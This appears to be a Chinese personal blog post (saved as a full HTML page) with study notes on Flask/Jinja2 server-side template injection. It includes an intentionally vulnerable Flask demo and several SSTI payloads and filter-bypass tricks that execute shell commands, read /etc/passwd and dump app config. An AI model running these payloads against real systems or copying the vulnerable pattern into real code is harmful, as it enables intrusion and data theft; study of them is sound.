

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/2.png">
  <link rel="icon" href="/img/2.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <meta name="description" content="SSTI还是今天面试问道了，很无语。明明学过了还是不会。 跟着h3来学一下ssti（h3师傅写的python中的ssti）。 Flask跟一下w3cschool学习吧。 什么是FlaskFlask是一个用Python编写的Web应用程序框架。 环境配置一下环境，是真的离谱，挂了vpn一直报错。最后把vpn关了，一下就好了。  第一个flask应用必须在项目中导入Flask模块。  Flask类的一">
<meta property="og:type" content="article">
<meta property="og:title" content="SSTI（像h3师傅学习）">
<meta property="og:url" content="http://example.com/2022/03/15/SSTI%EF%BC%88%E5%83%8Fh3%E5%B8%88%E5%82%85%E5%AD%A6%E4%B9%A0%EF%BC%89/index.html">
<meta property="og:site_name" content="Xsw6_a">
<meta property="og:description" content="SSTI还是今天面试问道了，很无语。明明学过了还是不会。 跟着h3来学一下ssti（h3师傅写的python中的ssti）。 Flask跟一下w3cschool学习吧。 什么是FlaskFlask是一个用Python编写的Web应用程序框架。 环境配置一下环境，是真的离谱，挂了vpn一直报错。最后把vpn关了，一下就好了。  第一个flask应用必须在项目中导入Flask模块。  Flask类的一">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152240237.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152128322.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152240893.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152134784.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152240297.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152240038.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152240131.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152240571.png">
<meta property="article:published_time" content="2022-03-15T14:39:29.000Z">
<meta property="article:modified_time" content="2022-03-16T08:48:13.324Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152240237.png">
  
  <title>SSTI（像h3师傅学习） - Xsw6_a</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.12","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname"}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 6.0.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>热爱使我从未停下脚步</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-about-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/1.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="SSTI（像h3师傅学习）">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-03-15 22:39" pubdate>
        2022年3月15日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.7k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      11 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">SSTI（像h3师傅学习）</h1>
            
            <div class="markdown-body">
              <h1 id="SSTI"><a href="#SSTI" class="headerlink" title="SSTI"></a>SSTI</h1><p>还是今天面试问道了，很无语。明明学过了还是不会。</p>
<p>跟着h3来学一下ssti（<a target="_blank" rel="noopener" href="http://h3geeker.top/posts/b0c48792.html#toc-heading-1">h3</a>师傅写的python中的ssti）。</p>
<h2 id="Flask"><a href="#Flask" class="headerlink" title="Flask"></a>Flask</h2><p>跟一下<a target="_blank" rel="noopener" href="https://www.w3cschool.cn/flask/flask_overview.html">w3cschool</a>学习吧。</p>
<h3 id="什么是Flask"><a href="#什么是Flask" class="headerlink" title="什么是Flask"></a>什么是Flask</h3><p>Flask是一个用Python编写的Web应用程序框架。</p>
<h3 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h3><p>配置一下环境，是真的离谱，<strong>挂了vpn一直报错</strong>。最后把vpn关了，一下就好了。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152240237.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220315211150"></p>
<h3 id="第一个flask应用"><a href="#第一个flask应用" class="headerlink" title="第一个flask应用"></a>第一个flask应用</h3><p>必须在项目中导入Flask模块。 </p>
<p>Flask类的一个对象是我们的<strong>WSGI</strong>应用程序。</p>
<p><strong>WSGI</strong>应用程序：<strong>WSGI，全称 Web Server Gateway Interface，或者 Python Web Server Gateway Interface ，是为 Python 语言定义的 Web 服务器和 Web 应用程序或框架之间的一种简单而通用的接口。</strong></p>
<p><strong>wsgi是一个web组件的接口防范，wsgi将web组件分为三类：web服务器，web中间件，web应用程序</strong></p>
<p>Flask构造函数使用<strong>当前模块（__name __）</strong>的名称作为参数。</p>
<p>Flask类的**route()**函数是一个装饰器，它告诉应用程序哪个URL应该调用相关的函数。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python">app.route(rule, options)<br><br>//rule 参数表示与该函数的URL绑定。<br><br>//options 是要转发给基础Rule对象的参数列表。<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152128322.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220315212747"></p>
<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152240893.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220315212650"></p>
<p>这里就简单了解一下。后续在继续学习。</p>
<h2 id="Jinja模板"><a href="#Jinja模板" class="headerlink" title="Jinja模板"></a>Jinja模板</h2><h3 id="特点"><a href="#特点" class="headerlink" title="特点"></a>特点</h3><figure class="highlight nim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs nim">&#123;<span class="hljs-meta">&#123;...&#125;</span>&#125;:装载一个变量，模板渲染时，会使用传进来的同名参数变量的代表值替换<br>&#123;%...%&#125;:装载一个控制语句<br>&#123;<span class="hljs-comment">#...#&#125;:装载一个注释，模板渲染的时候会忽视这中间的值</span><br></code></pre></td></tr></table></figure>

<h3 id="Jinja2中for循环的内置常量"><a href="#Jinja2中for循环的内置常量" class="headerlink" title="Jinja2中for循环的内置常量"></a>Jinja2中for循环的内置常量</h3><p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152134784.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220315213343"></p>
<h3 id="过滤器"><a href="#过滤器" class="headerlink" title="过滤器"></a>过滤器</h3><p>过滤器是通过管道符<code>|</code>来使用的，例如<code>&#123;&#123;name|length&#125;&#125;</code>：来返回name的长度</p>
<p>过滤器想当于一个函数，把当前的变量传入到过滤器中，然后过滤器根据自己的功能，再返回相应的值然后把结果渲染到页面中。</p>
<p>回到主题！</p>
<h2 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h2><p>漏洞成因就是服务端接收了用户的恶意输入以后，未经任何处理就将其作为 Web 应用模板内容的一部分，模板引擎在进行目标编译渲染的过程中，执行了用户插入的可以破坏模板的语句，因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性</p>
<p><strong>如果再渲染之前，存在接受用户输入的操作，并且未经任何处理就将其作为 Web 应用模板内容的一部分，就有可能造成SSTi漏洞的产生</strong>。</p>
<h3 id="Demo"><a href="#Demo" class="headerlink" title="Demo"></a>Demo</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask, request<br><span class="hljs-keyword">from</span> jinja2 <span class="hljs-keyword">import</span> Template<br><br>app = Flask(__name__)<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/xsw6a&quot;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>():<br>    name = request.args.get(<span class="hljs-string">&#x27;name&#x27;</span>, <span class="hljs-string">&#x27;guest&#x27;</span>)<br><br>    t = Template(<span class="hljs-string">&quot;Hello &quot;</span> + name)<br>    <span class="hljs-keyword">return</span> t.render()<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&quot;__main__&quot;</span>:<br>    app.run()<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152240297.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220315214324"></p>
<p>那么我们可以将这里的8*8换成别的python函数，来回显结果。获取数据。</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>由于在jinja2中是可以直接访问python的一些对象及其方法的，所以可以通过构造继承链来执行一些操作，比如文件读取，命令执行等：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152240038.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220315214759"></p>
<h3 id="利用魔术方法"><a href="#利用魔术方法" class="headerlink" title="利用魔术方法"></a>利用魔术方法</h3><ul>
<li>class返回[]所属的对象</li>
<li>class+base:返回这个对象所继承的基类</li>
<li>class+base+subclasses:找到了这个对象的基类，那么就返回这个基类下所具有的子类</li>
</ul>
<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152240131.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220315220342"></p>
<p>类，在这里面我们不乏可以找到我们要用的子类如前文所提到的：file、open等等。</p>
<p>这里还有一个小技巧：</p>
<p>可以通过notepad++，快速查找。<br><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203152240571.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220315222043"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> &#123;&#125;.__class__.__base()<br>        <span class="hljs-built_in">print</span>(c)<br></code></pre></td></tr></table></figure>

<p>也就是说可以找到一些命令执行的东西。</p>
<p>这些命令的东西可以在这里找到。</p>
<h3 id="1、os-system"><a href="#1、os-system" class="headerlink" title="1、os.system()"></a>1、os.system()</h3><p>用法：os.system(command)<br>但是用这个无法回显。</p>
<h3 id="2、os-popen"><a href="#2、os-popen" class="headerlink" title="2、os.popen()"></a>2、os.popen()</h3><p>用法：os.popen(command[,mode[,bufsize]])</p>
<p>popen方法通过p.read()获取终端输出，而且popen需要关闭close().当执行成功时，close()不返回任何值，失败时，close()返回系统返回值（失败返回1）. 可见它获取返回值的方式和os.system不同。<br>还需要了解一个魔法函数<br>globals该属性是函数特有的属性,记录当前文件全局变量的值,如果某个文件调用了os、sys等库,但我们只能访问该文件某个函数或者某个对象，那么我们就可以利用globals属性访问全局的变量。该属性保存的是函数全局变量的字典引用。</p>
<p>大体就是这样吧。姑且了解一下。</p>
<p>回归正题。今天护网的师傅问我问题。然后我很焦虑。问了我一些bypass问题。其中有一个就是ssti的。害!</p>
<p>看看h3师傅的。</p>
<h2 id="bypass"><a href="#bypass" class="headerlink" title="bypass"></a>bypass</h2><p>1、拼接（过滤了命令执行的函数）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-built_in">object</span>.__subclasses__()[<span class="hljs-number">59</span>].__init__.func_globals[<span class="hljs-string">&#x27;linecache&#x27;</span>].__dict__[<span class="hljs-string">&#x27;o&#x27;</span>+<span class="hljs-string">&#x27;s&#x27;</span>].__dict__[<span class="hljs-string">&#x27;sy&#x27;</span>+<span class="hljs-string">&#x27;stem&#x27;</span>](<span class="hljs-string">&#x27;ls&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>2、过滤[]（这里h3师傅的没有理解到）</p>
<p>借助request对象：<br>request变量可以访问所有已发送的参数，因此我们可以request.args.param用来检索新的paramGET参数的值,将其中的request.args改为request.values则利用post的方式进行传参</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;&#123; ().__class__.__bases__.__getitem__(<span class="hljs-number">0</span>).__subclasses__().pop(<span class="hljs-number">40</span>)(request.args.path).read() &#125;&#125;&amp;path=/etc/passwd<br></code></pre></td></tr></table></figure>

<p><strong>其他处的：</strong></p>
<ul>
<li>如果对我们特定的参数进行了严格的过滤，我们就可以使用<code>request</code>来进行绕过，request可以获得请求的相关信息，我们拿过滤<code>__class__</code>，可以用<code>request.args.t1</code>且以GET方式提交<code>t1=__class__</code>来替换被过滤的<code>__class__</code></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>.__class__&#125;&#125; =&gt; &#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>[request.args.t1]&#125;&#125;&amp;t1=__class__<br></code></pre></td></tr></table></figure>

<p>3、过滤双下划线__</p>
<ul>
<li>编码绕过          _<code>是</code>\x5f<code>，</code>.<code>是</code>\x2E</li>
<li></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;&#123;<br><span class="hljs-string">&#x27;&#x27;</span>[request.args.<span class="hljs-keyword">class</span>][request.args.mro][<span class="hljs-number">2</span>][request.args.subclasses]()[<span class="hljs-number">40</span>](<span class="hljs-string">&#x27;/etc/passwd&#x27;</span>).read()<br>&#125;&#125;&amp;<span class="hljs-keyword">class</span>=__class__&amp;mro=__mro__&amp;subclasses=__subclasses__<br></code></pre></td></tr></table></figure>

<p>这里一下又明白了上面h3师傅的意思。</p>
<p>4、过滤一些函数名如__import__等</p>
<p>python的初始模块_builtin__里有很多危险的方法，一条路没了就找找其他的路<br>我们可以直接用 eval() exec() execfile()等</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">__builtins__.<span class="hljs-built_in">eval</span>()<br></code></pre></td></tr></table></figure>

<p>5、绕过config参数</p>
<p><code>&#123;&#123;config&#125;&#125;</code>可以获取当前设置，如果题目类似<code>app.config [&#39;FLAG&#39;] = os.environ.pop（&#39;FLAG&#39;）</code>，那可以直接访问<code>&#123;&#123;config['FLAG']&#125;&#125;</code>或者<code>&#123;&#123;config.FLAG&#125;&#125;</code>得到flag<br>但是如果被过滤了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;&#123;self&#125;&#125; ⇒ &lt;TemplateReference <span class="hljs-literal">None</span>&gt;<br>&#123;&#123;self.__dict__._TemplateReference__context.config&#125;&#125; ⇒ 同样可以找到config<br></code></pre></td></tr></table></figure>

<p>6、删除了很多模块，但是没有删除reload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">reload(__builtins__)，重新加载被删除的模块，直接命令执行，只用于py2 <br></code></pre></td></tr></table></figure>

<p>7、过滤小点号</p>
<p>可以采用绕过</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">attr</span><span class="hljs-params">()</span></span>或<span class="hljs-selector-attr">[]</span><br></code></pre></td></tr></table></figure>

<p>8、过滤括号</p>
<p>可以使用{ % % }中间可以执行if语句，利用这一点可以进行类似盲注的操作或者外带代码执行结果</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/SSTI/">SSTI</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/web/">web</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/03/16/Jdk7u21%E5%8E%9F%E7%94%9F%E9%93%BE/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Jdk7u21原生链</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/03/15/Linux%E7%9F%A5%E8%AF%86%E7%82%B9/">
                        <span class="hidden-mobile">Linux知识点</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
    <!--《添加网站运行时间 -->
<br/>

<span id="timeDate">载入天数...</span><span id="times">载入时分秒...</span>
<script>
var now = new Date(); 

function createtime() {
    //此处修改你的建站时间或者网站上线时间
    var grt = new Date('02/23/2022 00:00:00');
    now.setTime(now.getTime() + 250);
    days = (now - grt) / 1000 / 60 / 60 / 24;

    dnum = Math.floor(days);
    hours = (now - grt) / 1000 / 60 / 60 - (24 * dnum);
    hnum = Math.floor(hours);
    if (String(hnum).length == 1) {
        hnum = "0" + hnum;
    }
    minutes = (now - grt) / 1000 / 60 - (24 * 60 * dnum) - (60 * hnum);
    mnum = Math.floor(minutes);
    if (String(mnum).length == 1) {
        mnum = "0" + mnum;
    }
    seconds = (now - grt) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
    snum = Math.round(seconds);
    if (String(snum).length == 1) {
        snum = "0" + snum;
    }
    document.getElementById("timeDate").innerHTML = "" + dnum + " 天 ";
    document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒";
}
setInterval("createtime()", 250);
</script>

<!-- 添加网站运行时间》-->

  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
